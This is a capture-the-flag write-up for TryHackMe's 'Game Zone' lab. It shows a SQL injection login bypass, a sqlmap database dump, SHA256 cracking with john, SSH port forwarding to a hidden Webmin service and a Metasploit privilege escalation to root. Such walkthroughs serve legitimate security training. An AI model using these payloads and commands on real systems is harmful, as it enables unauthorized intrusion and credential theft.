- Link: https://tryhackme.com/room/gamezone
- Difficulty: Easy
- Target: user and root flags on a Linux server
- Highlights: leveraging port forwarding to expose a webservice from behind a firewall, using
sqlmapto find a username and hashed password
- Tools used:
john the ripper,
- Tags: sqli, hashcracking, metasploit, ssh tunnel
In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!
export targetIP=10.10.163.79 export myIP=10.6.2.23
Let’s kick things off with our standard
dirb scans. We’ll let these run while we go ahead and walk the website looking for interesting leads.
To find the character’s name on the main page, we can do a reverse image search on google. I’ve played this title before but forgot his name, so I just googled “hitman game character name” to find the answer to our first question. (agent 47)
NMAP SCAN RESULTS
DIRB SCAN RESULTS
WALK THE WEBSITE
We see a login portal on the landing page of our target IP. We also look at the
/images folder that
dirb found, but nothing remarkable is there at first glance.
Due to a lack of proper data sanitization, we discover that the login can be bypassed by entering the following username and leaving the password blank:
' or 1=1 -- -
The login trick works, and we are presented with a search box.
INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP
Let’s fire up
burpsuite now to intercept an HTTP-post request made with this search box.
Intercepted HTTP-post request:
POST /portal.php HTTP/1.1 Host: 10.10.134.32 Content-Length: 17 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.134.32 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.134.32/portal.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5 Connection: close searchitem=hitman
We’ll save this request in a file titled
If you use
burpsuite to capture the request, you can directly download it as a file. A word of caution: Using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the
USING SQLMAP TO EXTRACT THE FULL DATABASE
With the following command, we can instruct
sqlmap to attempt to download (dump) the entire database and search for login username and hashed password.
sqlmap -r req --dbms=mysql --dump --level 5
It worked! We see that the database stores a list of game titles and reviews.
The most interesting piece of information here is the password. It looks like a hashed password. We can use an online hash identifier program like hashes.com to find out the hash type.
+------------------------------------------------------------------+----------+ | pwd | username | +------------------------------------------------------------------+----------+ | ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
We can see that it is probably a SHA256 encrypted string. Now it’s time to …
CRACK THAT HASH WITH JOHN (THE RIPPER)!
john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256
rockyou.txt is a legendary leaked database of passwords (14,344,391 passwords!)
Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x]) Warning: poor OpenMP scalability for this hash type, consider --fork=4 Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status videogamer124 (?) 1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912 Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably Session completed
SSH INTO THE BOX AND GRAB THE USER FLAG
We are in!
agent47@gamezone:~$ cat user.txt 64—---digits omitted—--------5c
This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener.
Let’s check for hidden services running on ports that may be behind a firewall. We can use the ss utility to check out all of the data connections from each port on our target machine.
agent47@gamezone:~$ ss -t -u -l -p -n
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 *:10000 *:*
This first line is curious. It appears that a service is running on port 10000 of the target system.
Let’s go ahead and port forward to see what is lying behind the firewall. Port 10000 is typically used for server tools and configuration services.
SET UP PORT FORWARD WITH SSH
The following command will activate port forwarding via ssh:
ssh -L 10000:localhost:10000 firstname.lastname@example.org password: —-cracked-password—- Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 109 packages can be updated. 68 updates are security updates. Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23 agent47@gamezone:~$
We are connected now with port forwarding in place. Let’s navigate in our browser to
After logging in with the same
username:password combination we used with
ssh, we are given access to a webmin portal.
PRIVESC WITH METASPLOIT
webmin in Metasploit brings up the following Metasploit module.
Let’s use it and set it up with the following options:
Let it rip!
And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.
sessions -i 0
And we now have our root flag! Thanks for reading this write-up.
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.